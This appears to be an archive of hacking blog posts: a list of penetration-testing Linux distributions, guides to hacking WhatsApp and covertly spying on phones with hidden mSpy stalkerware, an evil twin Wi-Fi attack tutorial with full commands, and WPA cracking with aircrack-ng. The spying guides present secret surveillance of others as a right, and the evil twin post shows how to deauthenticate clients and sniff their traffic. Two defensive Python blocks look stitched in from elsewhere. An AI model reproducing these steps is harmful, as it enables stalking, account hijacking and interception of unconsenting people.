
Friday 22 April 2016

Top 15 Advanced Operating Systems For Hackers


Today we are discussing the top 15 advanced operating systems that ship with strong penetration testing and ethical hacking tools. The top OS on this list is my favorite Linux distro, Kali Linux, because it is very popular in pentesting and it is developed by the same team as BackTrack (Offensive Security). I am not including BackTrack on this list because it is no longer available officially on their website, and its successor is Kali Linux. All the listed operating systems are based on the Linux kernel, so they are all free. (Download links are included for all OSes.) :)

I recommend you read my earlier post to learn more about Linux distros related to hacking and security: Linux Powerful Distros For Hacking Or Security: Kali, Tails And Qubes

Recommended: Become a Hacker: Best 20 Tips for Beginners to Start Learning


1. Kali Linux



Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack. Kali Linux is the most versatile and advanced penetration testing distro. Kali keeps its tools updated and it is available for many different platforms like VMware and ARM. If you want to know more about Kali Linux, I recommend you read my previous article: An Introduction To Hacker’s OS Kali Linux And Setup Tutorial.

Click here to download



2. BackBox



It includes some of the most used security and analysis Linux tools, covering a wide range of goals, from web application analysis to network analysis, from stress tests to sniffing, and including vulnerability assessment, computer forensic analysis and exploitation.

The power of this distribution comes from its Launchpad repository core, constantly updated to the latest stable version of the best-known and most used ethical hacking tools. The integration and development of new tools inside the distribution follows the conventions of the open source community and particularly the Debian Free Software Guidelines.

Click here to download


3. Parrot-sec Forensic OS



Parrot Security is an operating system based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux in order to provide the best penetration and security testing experience. It is an operating system for IT security and penetration testing developed by the Frozenbox Dev Team.

Parrot uses Kali repositories in order to take the latest updates for almost all the tools, but it also has its own dedicated repository where all the custom packages are kept. This is why this distro is not just a simple Kali “mod” but an entirely new concept which relies on Kali’s tool repositories. As such, it introduces a lot of new features and different development choices. Parrot uses MATE as its desktop environment: a lightweight and powerful interface derived from the famous GNOME 2 and, thanks to FrozenBox, highly customizable with captivating icons, ad-hoc themes and wallpapers. The system look is proposed and designed by the community members and by members of the Frozenbox Network, who closely follow the development of this project.

Click here to download


4. DEFT




DEFT is an Ubuntu customization with a collection of computer forensic programs and documents created by thousands of individuals, teams and companies. Each of these works might come under a different licence. Their licence policy describes the process they follow in determining which software ships by default on the DEFT install CD.

Click here to download


5. Live Hacking OS



As I said before, Live Hacking OS is also based on Linux and has a big package of hacking tools useful for ethical hacking or penetration testing. It includes the GNOME graphical user interface. There is a second variant available which is command-line only and has much lower hardware requirements.

Click here to download


6. Samurai Web Security Framework



The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Click here to download



7. Network Security Toolkit (NST)



Network Security Toolkit (NST) is a bootable live CD based on Fedora Core. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of open source network security tools.

What we find rather fascinating about NST is that we can transform most x86 systems (Pentium II and above) into a system designed for network traffic analysis, intrusion detection, network packet generation, wireless network monitoring, a virtual system service server, or a sophisticated network/host scanner.

Click here to download



8. Bugtraq



Bugtraq is an electronic mailing list dedicated to issues about computer security. On-topic issues are new discussions about vulnerabilities, vendor security-related announcements, methods of exploitation, and how to fix them. It is a high-volume mailing list, and almost all new vulnerabilities are discussed there.
The Bugtraq team consists of experienced freaks and developers. It is available for Debian, Ubuntu and OpenSuSE in 32- and 64-bit architectures.

Click here to download



9. NodeZero



It is said that necessity is the mother of all invention, and NodeZero Linux is no different. Their team is built of testers and developers who have come to the consensus that live systems do not offer what they need in their security audits. Penetration testing distributions have historically utilized the “Live” system concept of Linux, which really means that they try not to make any permanent changes to a system. Ergo all changes are gone after reboot, and they run from media such as discs and USB drives. However, while all this may be very handy for occasional testing, its usefulness is depleted when you are testing regularly. It is their belief that “Live Systems” just don’t scale well in a robust testing environment.

Although NodeZero Linux can be used as a “Live System” for occasional testing, its real strength comes from the understanding that a tester requires a strong and efficient system. In their belief, this is achieved by working on a distribution that is a permanent installation, that benefits from a strong selection of tools integrated with a stable Linux environment.

Click here to download



10. Pentoo



Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided as both 32- and 64-bit installable live CDs. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet-injection-patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PaX hardening and extra patches, with binaries compiled from a hardened toolchain and the latest nightly versions of some tools available.

Click here to download



11. GnackTrack



GnackTrack is an open and free project to merge penetration testing tools and the Linux GNOME desktop. GnackTrack is a Live (and installable) Linux distribution designed for penetration testing and is based on Ubuntu.

BackTrack is not the only player in the field of ethical hacking, so you can try some other distributions as well; if you are a GNOME lover then you must try this, although BackTrack 5 is also available on the GNOME platform. Just like BackTrack, GnackTrack comes with multiple tools that are really helpful for effective penetration testing: it has Metasploit, Armitage, w3af and other wonderful tools.

Click here to download



12. Blackbuntu






Blackbuntu is a distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is a penetration testing distribution with the GNOME Desktop Environment. It is currently being built using Ubuntu 10.10 and uses Back|Track as its reference.

Click here to download



13. Knoppix STD



Knoppix STD (Security Tools Distribution) is a Live CD Linux distribution based on Knoppix that focuses on computer security tools. It includes GPL licensed tools in the following categories: authentication, password cracking, encryption, forensics, firewalls, honeypots, intrusion detection systems, network utilities, penetration, packet sniffers, assemblers, vulnerability assessment and wireless networking. Knoppix STD version 0.1 was published January 24, 2004, on Knoppix 3.2. Thereafter, the project stagnated, lacking updated drivers and packages. A release date for version 0.2 has not yet been announced. A list of tools is available on the official website.

Click here to download



14. Weakerth4n



Weakerth4n is a penetration testing distribution built from Debian Squeeze. For the desktop environment it uses Fluxbox. This operating system is ideal for WiFi hacking as it contains plenty of wireless cracking and hacking tools. It has a very well maintained website and a devoted community.

Tool categories include: WiFi attacks, SQL hacking, Cisco exploitation, password cracking, web hacking, Bluetooth, VoIP hacking, social engineering, information gathering, fuzzing, Android hacking, networking and creating shells.

Click here to download


15. Cyborg Hawk



The most advanced, powerful and yet beautiful penetration testing distribution ever created, lined up with an ultimate collection of tools for professional ethical hackers and cyber security experts. It has 700+ tools while Kali has 300+, and it also has dedicated tools and a menu for mobile security and malware analysis. It is easy to compare it with Kali, since to make a better OS than Kali one has to outperform it. It is a new operating system based on Ubuntu Linux; I have not tested this OS, which is why I placed it last on this list.

Cyborg Hawk is developed by Team Cyborg, led by Vaibhav Singh and Shahnawaz Alam from Ztrela Knowledge Solutions Pvt. Ltd.

Click here to download

Thursday 21 April 2016

How to Hack WhatsApp Account

Need to Hack WhatsApp Account?
Below is a WhatsApp Hack Guide with Complete Instructions!
Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial. Since WhatsApp has become one of the most popular apps for sharing messages and media instantly, it has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth, people are left with no choice other than to hack a WhatsApp account.

Possible Ways to Hack WhatsApp

The following are the only two ways to hack WhatsApp account:

1. WhatsApp Hack using a Spying App: The Easiest Way

Even though there are several ways to hack WhatsApp, using a spy app is by far the simplest way. This method requires no prior hacking knowledge or technical skills to carry out and hence is more suitable for ordinary people. Installing a spy app to hack WhatsApp is as simple as installing any other app on a mobile. Out of the several apps out there, mSpy is my favorite one to hack WhatsApp:
mSpy Features:
  • Hack phone Calls and Text Messages.
  • Hack WhatsApp, Skype and other popular messengers.
  • Track Real-Time Location with GPS Tracker.
  • Spy on Contact List and Web Browsing activities.
  • Monitor Emails, Pictures and Videos.
  • Operates in Hidden Mode and remains Undetected!
  • No Rooting Required!

How to Hack WhatsApp with this App?

  1. Download and install the app onto the target phone, which takes not more than a minute.
  2. After this is done, the app silently records all WhatsApp activities in hidden mode.
  3. All the recorded WhatsApp chat is sent to your online account.
  4. View all the information from anywhere at anytime with your online account.
You can download mSpy from the link below:
Compatibility: Android, Apple iPhone, BlackBerry and Windows Mobile.

2. WhatsApp Hack by Spoofing MAC Address: The Tough Way

There is another method to hack WhatsApp known as MAC address spoofing, which involves spoofing the MAC address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the MAC address of the target WhatsApp phone, follow the steps below:
  1. Find out the MAC address of the target phone on which you need to hack the WhatsApp account:
    • For Android – Navigate to Settings —> About Device —> Status—> Wi-Fi MAC address
    • For iPhone – Navigate to Settings—> General —> About —> Wi-Fi address
  2. Once you have the MAC address of the target WhatsApp phone, you can spoof the MAC address as mentioned in my post: How to Spoof the MAC address.
  3. Next, install WhatsApp on your phone using the target phone number and verify it.
  4. Now you have an exact replica of the target WhatsApp account and you should receive all the conversations and updates on your phone as well.
This method of WhatsApp hacking is quite time consuming and is known to have a lower success rate than using spy apps. Therefore, if you do not have sufficient time and skills to implement this, I still recommend the use of mSpy to successfully hack a WhatsApp account.

Spy on Text Messages: Complete Guide

Since the popularity of text messages has significantly increased in recent years, they have also become a popular channel for many people to exchange secret messages and engage in dubious activities. Therefore, in order to find out the truth, sometimes it becomes necessary to spy on text messages such as WhatsApp, Viber and FB Messenger. Particularly if you are a parent or an employer, it becomes your right to spy so as to investigate what is happening with your child or employee.

Popular Ways to Spy on Text Messages

The following are some of the commonly used methods to spy on text messages such as SMS, IM chat conversations and emails.

1. Using a Spying App: The Easiest Way

Today, even though there exist a large number of mobile apps to spy on text messages, many are simply overpriced and some never really stand up to the competition at all. However, there are a few spy apps that are really worth mentioning, and mSpy is one of them. When it comes to spying on text messages, mSpy is my favorite. In addition to SMS, this app is capable of spying on various text messaging apps like WhatsApp, Viber, Snapchat, iMessage, Skype and many more.

The following are some of the exciting features of mSpy which makes it a perfect choice for spying on text messages:
  • Spy on call logs, SMS and contacts.
  • Secretly record emails, web history and bookmarks.
  • Spy on Internet activity including social media like Facebook, Twitter and Gmail.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  • Track GPS locations in real-time.
  • Record keystrokes, photos and videos.
  • Operates in a complete stealth mode and remains undetected!
For parents and employers, mSpy can offer an additional help as it supports a handful of control features as well:
  • Block access to unwanted apps and calls.
  • Remotely lock the phone or restrict its usage.
  • Remotely delete unwanted contacts, call logs, SMS and photos if desired.
  • Get instant alerts when profane language is typed or viewed.

How Does it Work?

After you order mSpy you will need to install the app onto the target phone which will only take 2-3 minutes to complete. If you need any assistance, the support team is ready to help you out any time you need.
Once the installation is complete, all of the recorded text messages and data will show on your online dashboard which can be accessed from any web browser across the world.

Compatible Phones: Android, BlackBerry, iPhone, iPad, Windows Mobile and Tablets.

2. Using a SIM Card Reader to Recover Text Messages

If you can’t really afford a spying app, you can buy a cheap SIM card reader from the market and use the target person’s SIM to recover text messages, phone contacts and email addresses stored on it. This can be done using the following steps:
  1. Switch Off the target phone and remove the SIM card from it.
  2. Insert the SIM card into the SIM card reader and plug-in the SIM card reader to the USB port on your personal computer.
  3. If your SIM card reader comes with a software CD/DVD, install it on your computer. This will help you recover any of the stored text messages from the SIM and store them on your PC for later review.
It is needless to mention that this method has clear drawbacks, as there is a chance of text messages being deleted from the SIM before you get access to it. Also, this method can only recover SMS (stored on the SIM) and not other text messages from messaging apps such as WhatsApp, Viber, Snapchat etc.
Therefore, to overcome this drawback, I still recommend the use of a spying app like mSpy to spy on text messages.

How to Track a Cell Phone




Are You Looking to Track a Cell Phone Location?
Relax, Here is a Complete Cell Phone Tracking Guide!
Are you looking to know how to track a cell phone with pinpoint accuracy? Do you need to know exactly where your child or employees are moving around during your absence? If so, you have come to the right place. In this article I will let you know some of the possible methods to GPS track a cell phone in simple steps.

1. How to Track a Cell Phone that Belongs to Someone Else?

If you need to track someone else’s phone, such as your children’s or employees’, you can simply use a cell phone tracking app such as mSpy. This is a very small app that can be installed in just a few simple steps, taking only 2-3 minutes. Once installed, the app stays hidden on the phone but keeps track of every activity on it, including its GPS location, call logs, text messages and more.
mSpy Features:
  • GPS Location Tracking: GPS positions are uploaded at a time interval you select with a link to the map.
  • Track Text Messages & Emails: Every text message sent and received including SMS and emails are logged even if the phone logs are deleted.
  • Call Logs: Each incoming and outgoing number on the phone is logged along with duration, date and time stamp.
  • Phone Contacts: Get access to complete contact list on the target phone.
  • Browser History: All websites visited on the phone are logged.
  • Social Networking & Messenger Activity: All social media activity such as Facebook, Twitter, LinkedIn, WhatsApp, Skype, iMessages, Instagram and many more are recorded.

How Does it Work?

You will have to download and install the app onto the target phone of whose location and activities you want to track. Installation takes only a few minutes during which you should have the target phone in your hand.
Once the installation is complete, the tracking process will begin immediately and the recorded logs are silently uploaded to your mSpy account. You can log in to your secure online account from your computer or phone at any time to view the logs containing GPS location, call activities, text messages and more. You can download mSpy from the link below:

Supported Phones: Android, iPhone, iPad and Tablets.

2. Tracking a Lost phone

Now, let us look at some of the possible options to track a phone in case it is lost or stolen.

For Android Phones:

If you need to track a lost Android phone, you can follow the steps mentioned below:
  1. Download Android Device Manager from the Google Play store and install it on another Android device. This app lets you track your stolen Android phone and also lets you remotely lock it or erase all the data on it.
  2. From “Android Device Manager” log in to your Google account using the same ID associated with your lost phone. After successful login this app will attempt to locate your device and show its last known location on the map.
  3. In addition, you will also be able to perform several actions on your lost phone, such as give it a Ring, Lock the device or Erase all the data stored on it.

For Apple iPhones:

If you need to track a lost iPhone, you can follow the steps mentioned below:
  1. Log in to the iCloud website using the Apple ID associated with your lost phone. Since location tracking is turned on by default on all iPhone devices, iCloud lets you track it from your web browser or your iPad and shows its location on the map.
  2. If your phone is found near your location, you have an option to Play Sound on it so that your iPhone will emit a sound, helping you track it down.
  3. If this does not help, you can choose the option Lost Mode, which will remotely lock your phone and display a phone number at which you can be reached.
  4. If none of the above options work, you can finally decide to go with the option Erase iPhone, which will completely wipe all the data stored on it. This way you can prevent your private information from falling into the wrong hands.

For Windows Phones:

In order to track down a lost Windows phone, you can try the steps below:
  1. Go to the Windows Phone website and locate the option Find My Phone in the top-right corner of the page.
  2. This will ask you to sign in using the Windows account associated with your lost phone. If your phone gets traced you will see a map showing its exact location. You will also find options to Lock, Ring and Erase its data in case your phone turns out to be completely lost.

Evil Twin Tutorial


Prerequisites

  1. Kali Linux
  2. Prior experience with wireless hacking
You will also need to install a tool (bridge-utils) which doesn't come pre-installed in Kali. No big deal-
apt-get install bridge-utils

Objectives

The whole process can be broken down into the following steps-
  1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng for finding the necessary info about the network, and airbase-ng to create its twin.
  2. Forcing the client to disconnect from the real AP and connect to yours. We'll use aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network.
  3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to our client.
  4. Have fun - monitor traffic from the client, maybe hack into his computer using Metasploit.
PS: The first 3 are primary objectives; the last one is optional and not a part of the evil twin attack as such. It is rather a man in the middle attack. Picture credits : firewalls.com


Information Gathering - airmon-ng

To see available wireless interfaces-
iwconfig



To start monitor mode on the available wireless interface (say wlan0)-
airmon-ng start wlan0
To capture packets from the air on the monitor mode interface (mon0)-
airodump-ng mon0
After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.


Creating the twin

Now we will use airbase-ng to create the twin network of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. After you have selected the network, take note of its ESSID and BSSID. Replace them in the given command-

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>
If you face any problems, a shorter code will be-
airbase-ng --essid <name of network> mon0 
Remove the angle brackets (< & >) and choose any channel that you want. Also, the BSSID can be randomly selected and doesn't have to match the target's. The interface would be mon0 (or whatever card you want to use). The only thing that has to be identical about the twins is their ESSID (the name of the network). However, it is better to keep all parameters the same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase has turned your wireless adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than this wireless card, because the card will be busy acting as an AP and won't be able to provide you with internet connectivity. So you either need another card, or broadband/ADSL/3G/4G/2G internet.

Man in the middle attack : Pic Credits:  owasp.net

Telling the client to get lost

Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin.
For this, the first part is to force it to disconnect. Aireplay will do that for us-
aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one


The 0 specifies the time interval at which to send the deauth requests. 0 means extremely fast, 1 would mean send a packet every second, 2 would mean a packet every 2 seconds, and so on. If you keep it as 0, your client will be disconnected in a matter of seconds, so fire up the command and press ctrl+c after only a few seconds. Note that the deauth is sent to broadcast, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible.
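From the other side of the air, the two steps described so far (a second AP beaconing the same ESSID, and a burst of broadcast deauthentication frames carrying the real AP's BSSID) are exactly what a wireless monitor should alert on. The script below is an added example written for this page, not code from the tutorial or from the aircrack-ng project. It assumes a capture tool has already exported management frames as records with a timestamp, frame subtype, claimed BSSID, destination, ESSID and channel; the sample frames are constructed inline, and the addresses and names in them are made up.

```python
from collections import defaultdict
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    """One 802.11 management frame as a monitor-mode capture would record it."""
    ts: float          # capture timestamp, seconds
    subtype: str       # "beacon" or "deauth"
    bssid: str         # transmitter address claimed by the frame
    dst: str           # destination address
    essid: str = ""    # network name (beacons only)
    channel: int = 0   # channel the beacon was seen on (beacons only)


def find_duplicate_essids(frames):
    """Return {essid: sorted [(bssid, channel), ...]} for every ESSID that is
    advertised by more than one BSSID. A second BSSID announcing a name you
    expect from only one AP is the trace a twin AP leaves on the air."""
    seen = defaultdict(set)
    for f in frames:
        if f.subtype == "beacon" and f.essid:
            seen[f.essid].add((f.bssid.lower(), f.channel))
    return {
        essid: sorted(aps)
        for essid, aps in seen.items()
        if len({bssid for bssid, _ in aps}) > 1
    }


def find_deauth_bursts(frames, window=1.0, threshold=10):
    """Sliding-window count of deauth frames per claimed BSSID. Returns
    {bssid: (peak frames in any `window` seconds, fraction sent to broadcast)}
    for BSSIDs whose peak reaches `threshold`. A real AP sends a handful of
    unicast deauths; a flood to ff:ff:ff:ff:ff:ff is what the tutorial's
    interval-0 deauth looks like."""
    per_bssid = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            per_bssid[f.bssid.lower()].append(f)
    alerts = {}
    for bssid, lst in per_bssid.items():
        lst.sort(key=lambda f: f.ts)
        peak, start = 0, 0
        for end in range(len(lst)):
            while lst[end].ts - lst[start].ts > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            to_bcast = sum(1 for f in lst if f.dst.lower() == BROADCAST) / len(lst)
            alerts[bssid] = (peak, round(to_bcast, 2))
    return alerts


def build_sample_frames():
    """Constructed sample, not a real capture: one legitimate AP, a twin of it
    with a different BSSID, an unrelated AP, a burst of 40 broadcast deauths
    carrying the legitimate BSSID, and one ordinary unicast deauth."""
    frames = []
    for i in range(5):
        t = i * 0.1
        frames.append(Frame(t, "beacon", "aa:bb:cc:dd:ee:01", BROADCAST, "CoffeeShop", 6))
        frames.append(Frame(t + 0.02, "beacon", "02:11:22:33:44:55", BROADCAST, "CoffeeShop", 6))
        frames.append(Frame(t + 0.04, "beacon", "aa:bb:cc:dd:ee:02", BROADCAST, "OtherNet", 11))
    for i in range(40):
        frames.append(Frame(1.0 + i * 0.01, "deauth", "aa:bb:cc:dd:ee:01", BROADCAST))
    frames.append(Frame(3.0, "deauth", "aa:bb:cc:dd:ee:02", "66:77:88:99:aa:bb"))
    return frames


if __name__ == "__main__":
    frames = build_sample_frames()
    for essid, aps in find_duplicate_essids(frames).items():
        print(f"[twin?] '{essid}' advertised by {len(aps)} BSSIDs: {aps}")
    for bssid, (peak, bcast) in find_deauth_bursts(frames).items():
        print(f"[deauth flood] {bssid}: {peak} frames/s, {bcast:.0%} to broadcast")
```

Two design points: the ESSID check keys on the pair (BSSID, channel), so a legitimate multi-AP network that shares one name across known BSSIDs can be whitelisted by comparing against an inventory rather than alerting on every duplicate; and the deauth check counts by the BSSID the frame claims, because the deauth on this page is sent with the real AP's address, so the alert names the victim AP, not the sender.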

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that we need more signal strength. There are 2 ways to do that-

  1. Physically move closer to the client.
  2. Power up your wireless card to transmit at more power. 
The latter can be done with the following command -
iwconfig wlan0 txpower 27
Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support up to 30 dBm, but many countries don't allow the card to transmit at such power. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit at 30 dBm, and by changing the regulatory domain, we can overcome the power limitation.
iw reg set BO
iwconfig wlan0 txpower 30
It is strongly advised not to break laws, as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that of the real twin.

Note : If you are unable to get your client to connect to you, there is another option: you can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.


Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. If you are connected to the net via wireless, replace x0 with wlan1 or wlan0; a 3G modem will show up as ppp0. In any case, you just have to know which interface is providing you with internet, and you can route the internet access to your client.

Interfaces

  • x0 - This has internet access
  • at0 - This is created by airbase-ng (the wired face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can connect to the net.
  • evil - This is an interface that we will create, whose job will be to actually bridge the networks.

Creating evil

We will use the bridge control utility provided by Kali, brctl. Execute the following command-
brctl addbr evil
This will create the bridge. Now we have to specify which two interfaces have to be bridged-
brctl addif evil x0
brctl addif evil at0
We can assign an IP to the interfaces and bring them up using-
ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
Also bring up the evil interface (the interfaces aren't always up by default, so we often have to do this)-
ifconfig evil up
Now to auto-configure all the complicated DHCP settings, we'll use dhclient-
dhclient3 evil &
Finally, all the configuration has been completed. You can execute ifconfig and see the results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake network, and can use the internet pretty easily. He will not have any way to find out what went wrong. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a man in the middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea of what you can do.

Sniffing using Wireshark

Now all the packets that go from the user to the internet pass through our evil interface, and these packets can be monitored via Wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea of how to use Wireshark. Pic credits: The picture on the right has been taken directly from their website.

WPA/WPA-2 cracking using Dictionary attack with Aircrack-ng


WPA cracking involves 2 steps-

  1. Capture the handshake
  2. Crack the handshake to get the password

We have already covered WPA handshake capture in a lot of detail. In this tutorial we will actually crack a WPA handshake file using a dictionary attack. Our tool of choice for this tutorial will be aircrack-ng. We will not bother about the speed of various tools in this post. However, in the next post, we will compare various CPU and GPU algorithms for WPA hash cracking. I'd like to add that I already know the password of the network, so I'll simply put it into the dictionary that I'm using. A full-fledged dictionary attack is quite time consuming.

Also, a lot of people are facing problems with monitor mode in Kali 2.0. I have a post regarding that coming soon.
PS: If you stumbled on this post out of nowhere and find it hard to follow, I recommend you go through some of the easier posts first. How to use this site is a good place to begin.




My current state

I have already captured a WPA handshake for my Wifi. The password is fairly strong so one can't rely on any dictionary. So just for the sake of this exercise, I'll put the password in the dictionary myself.

My handshake capture


The handshake is captured in a file students2-01.cap (you can name yours whatever you want).

wireshark students2-01.cap
This command can be used to go through the packets captured. We will learn more about Wireshark later, when I will guide you through a complete EAPoL 4-way handshake. For this tutorial, let's move on.

My dictionary file

root@kali:~# cat new.txt
firstpass
secondpass
randompass
************ 


The last line has the password.

Action!

root@kali:~# aircrack-ng students2-01.cap -w new.txt

It will ask for the index number of the target network. Select the network you want to hack.
I chose 13


It didn't take any time at all, considering Aircrack had to check a total of 4 keys!!!
                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 4 keys tested (589.45 k/s)


                           KEY FOUND! [ ***************** ]


      Master Key     : 60 B7 9D 29 26 0F 92 65 ** ** ** ** **

      Transient Key  : 1C F2 23 FE B3 67 ** ** ** *
                      
      EAPOL HMAC     : F9 A1 5D ** ** ** ** **
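What aircrack-ng does per dictionary word, and why the "keys tested" rate matters, is easier to reason about with the derivation in hand. The block below is an added example for this page, not code from the post or from aircrack-ng: it derives the WPA/WPA2 Pairwise Master Key the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 rounds, 32 bytes) and checks it against the standard's published test vector (passphrase "password", SSID "IEEE"), then uses the cost of that derivation to answer the defender's questions: is my passphrase in a wordlist like the one above at all, and how long would exhausting such a list take at a given rate? The wordlist and the candidate passphrases are constructed; the measured rate is whatever your machine produces.

```python
import hashlib
import time

PBKDF2_ROUNDS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-Personal
PMK_LEN = 32


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key exactly as the standard does:
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    Every candidate word in a dictionary run costs one of these, which is
    why the per-guess rate (not the handshake itself) bounds the attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def measure_guess_rate(ssid: str, seconds: float = 0.3) -> float:
    """Rough single-core PMK derivations per second on this machine."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        wpa_pmk(f"candidate-{n}", ssid)
        n += 1
    return n / (time.perf_counter() - start)


def expected_seconds(candidates: int, rate: float) -> float:
    """Mean time to reach a target that is equally likely to be any of
    `candidates` guesses, at `rate` guesses per second: half the space."""
    return candidates / 2 / rate


def audit_passphrase(passphrase: str, ssid: str, wordlist, rate: float) -> dict:
    """Defender's view of a passphrase: is it in the wordlist at all, and
    how long would exhausting that wordlist take at the given rate?"""
    words = list(wordlist)
    return {
        "in_wordlist": passphrase in set(words),
        "wordlist_seconds": expected_seconds(len(words), rate),
        "pmk_hex": wpa_pmk(passphrase, ssid).hex(),
    }


if __name__ == "__main__":
    # Constructed wordlist in the spirit of the post's new.txt (not a real list)
    wordlist = ["firstpass", "secondpass", "randompass", "password"]
    rate = measure_guess_rate("IEEE")
    print(f"this core: ~{rate:,.0f} PMK/s")
    for candidate in ("password", "gT7#qp!mR2vz"):   # constructed candidates
        print(candidate, audit_passphrase(candidate, "IEEE", wordlist, rate))
    # A random 12-character passphrase over 62 symbols against a million-guess
    # per second attacker: the number that makes wordlists irrelevant.
    years = expected_seconds(62 ** 12, 1e6) / (365 * 86400)
    print(f"62^12 keyspace at 1e6 guesses/s: ~{years:.3g} years")
```

The useful comparison is the two `wordlist_seconds` figures against the `years` figure: a passphrase that appears in any list an attacker is likely to carry falls in seconds regardless of PBKDF2, while one drawn at random from a large keyspace is out of reach at any realistic rate, so the audit that matters is list membership, not entropy arithmetic.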